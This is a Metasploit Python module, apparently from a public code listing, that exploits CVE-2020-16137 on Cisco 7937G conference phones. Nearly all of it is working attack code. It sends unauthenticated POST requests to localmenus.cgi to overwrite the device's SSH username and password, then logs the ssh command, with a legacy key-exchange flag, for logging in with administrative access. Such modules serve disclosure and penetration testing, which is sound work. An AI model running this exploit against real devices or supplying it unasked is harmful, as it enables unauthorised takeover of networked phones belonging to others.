Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
#!/usr/bin/env python3
2
# -*- coding: utf-8 -*-
3

4
# standard modules
5
from metasploit import module
6
import logging
7

8
# extra modules
9
dependency_missing = False
10

11
try:
12
    import requests
13
except ImportError:
14
    dependency_missing = True
15

16

17
metadata = {
18
    'name': 'Cisco 7937G SSH Privilege Escalation',
19
    'description': '''
20
	This module exploits a feature that should not be available 
21
	via the web interface. An unauthenticated user may change 
22
	the credentials for SSH access to any username and password 
23
	combination desired, giving access to administrative 
24
	functions through an SSH connection.
25
    ''',
26
    'authors': [
27
        'Cody Martin'
28
	# Author Homepage: debifrank.github.io
29
	# Organization: BlackLanternSecurity
30
	# Org. Homepage: BlackLanternSecurity.com
31
    ],
32
    'date': '2020-06-02',
33
    'license': 'GPL_LICENSE',
34
    'references': [
35
        {'type': 'url', 'ref': 'https://web.archive.org/web/20200921054955/https://www.blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
36
        {'type': 'cve', 'ref': '2020-16137'}
37
    ],
38
    'type': 'single_scanner',
39
    'options': {
40
        'rhost': {'type': 'address', 
41
		'description': 'Target address', 
42
		'required': True, 
43
		'default': ''},
44
        'USER': {'type': 'string', 
45
		'description': 'Desired username', 
46
		'required': True, 
47
		'default': ''},
48
        'PASS': {'type': 'string', 
49
		'description': 'Desired password', 
50
		'required': True, 
51
		'default': ''},
52
        'TIMEOUT': {'type': 'int', 
53
		'description': 'Timeout in seconds', 
54
		'required': True, 
55
		'default': 5}
56
    }
57
}
58

59

60
def run(args):
61
    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
62
    if dependency_missing:
63
        logging.error('Python module dependency (requests) is missing, cannot continue')
64
        logging.error('Please execute pip3 install requests.')
65
        return
66

67
    url = "http://{}/localmenus.cgi".format(args['rhost'])
68
    payload_user = {"func": "403", "set": "401",
69
                    "name1": args['USER'], "name2": args['USER']}
70
    payload_pass = {"func": "403", "set": "402",
71
                    "pwd1": args['PASS'], "pwd2": args['PASS']}
72
    logging.info("Attempting to set SSH credentials.")
73
    try:
74
        r = requests.post(url=url, params=payload_user,
75
                          timeout=int(args['TIMEOUT']))
76
        if r.status_code != 200:
77
            logging.error("Device doesn't appear to be functioning or web access is not enabled.")
78
            return
79

80
        r = requests.post(url=url, params=payload_pass, timeout=int(args['TIMEOUT']))
81
        if r.status_code != 200:
82
            logging.error("Device doesn't appear to be functioning or web access is not enabled.")
83
            return
84
    except requests.exceptions.RequestException:
85
        logging.error("Device doesn't appear to be functioning or web access is not enabled.")
86
        return
87

88
    logging.info("SSH attack finished!")
89
    logging.info(("Try to login using the supplied credentials {}:{}").format(
90
        args['USER'], args['PASS']))
91
    logging.info("You must specify the key exchange when connecting or the device will be DoS'd!")
92
    logging.info(("ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 {}@{}").format(args['USER'], args['rhost']))
93
    return
94

95

96
if __name__ == "__main__":
97
    module.run(metadata, run)
98

99